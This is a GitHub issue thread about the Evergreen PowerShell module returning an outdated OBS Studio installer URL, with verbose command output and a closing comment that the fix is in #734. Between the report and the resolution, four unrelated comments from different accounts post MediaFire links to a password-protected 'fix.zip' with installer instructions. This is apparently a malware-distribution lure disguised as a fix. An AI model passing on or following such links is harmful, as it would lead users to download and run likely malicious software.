### ISSUE TITLE
[Bug]: OBS Studio changed Download URL

### ISSUE THREAD

**Issue by ChristianOe** [aaronparker/evergreen#733]
### What happened?

The new download url from fastly is https://cdn-fastly.obsproject.com/downloads/OBS-Studio-30.2.3-Windows-Installer.exe but the URL from the module is https://cdn-fastly.obsproject.com/downloads/OBS-Studio-30.2.3-Full-Installer-x64.exe

### Version

2407.1202

### What PowerShell edition/s are you running Evergreen on?

Windows PowerShell

### Which operating system/s are you running Evergreen on?

Windows 10+

### Have you reviewed the documentation?

- [X] Troubleshooting at: https://stealthpuppy.com/evergreen/troubleshoot/
- [X] Known issues at: https://stealthpuppy.com/evergreen/issues/

### Verbose output

```shell
PS C:\WINDOWS\system32> Get-EvergreenApp OBSStudio -Verbose
AUSFÜHRLICH: Function path: C:\Program Files\WindowsPowerShell\Modules\Evergreen\2407.1202\Apps\Get-OBSStudio.ps1
AUSFÜHRLICH: Function exists: C:\Program Files\WindowsPowerShell\Modules\Evergreen\2407.1202\Apps\Get-OBSStudio.ps1.
AUSFÜHRLICH: Dot sourcing: C:\Program Files\WindowsPowerShell\Modules\Evergreen\2407.1202\Apps\Get-OBSStudio.ps1.
AUSFÜHRLICH: Get-FunctionResource: read application resource strings from [C:\Program
Files\WindowsPowerShell\Modules\Evergreen\2407.1202\Manifests\OBSStudio.json]
AUSFÜHRLICH: Calling: Get-OBSStudio.
AUSFÜHRLICH: Invoke-EvergreenRestMethod: Invoke-RestMethod parameter: UseBasicParsing: True.
AUSFÜHRLICH: Invoke-EvergreenRestMethod: Invoke-RestMethod parameter: MaximumRedirection: 2.
AUSFÜHRLICH: Invoke-EvergreenRestMethod: Invoke-RestMethod parameter: DisableKeepAlive: True.
AUSFÜHRLICH: Invoke-EvergreenRestMethod: Invoke-RestMethod parameter: UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64;
x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.2478.67.
AUSFÜHRLICH: Invoke-EvergreenRestMethod: Invoke-RestMethod parameter: Method: Default.
AUSFÜHRLICH: Invoke-EvergreenRestMethod: Invoke-RestMethod parameter: Uri:
https://obsproject.com/update_studio/manifest.json.
AUSFÜHRLICH: Invoke-EvergreenRestMethod: Invoke-RestMethod parameter: ContentType: application/octet-stream.
AUSFÜHRLICH: GET https://obsproject.com/update_studio/manifest.json with 0-byte payload
AUSFÜHRLICH: received 372382-byte response of content type application/octet-stream

Version Architecture URI
------- ------------ ---
30.2.3  x64          https://cdn-fastly.obsproject.com/downloads/OBS-Studio-30.2.3-Full-Installer-x64.exe
```

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChristianOe** [comment]
Issue is fixed with #734
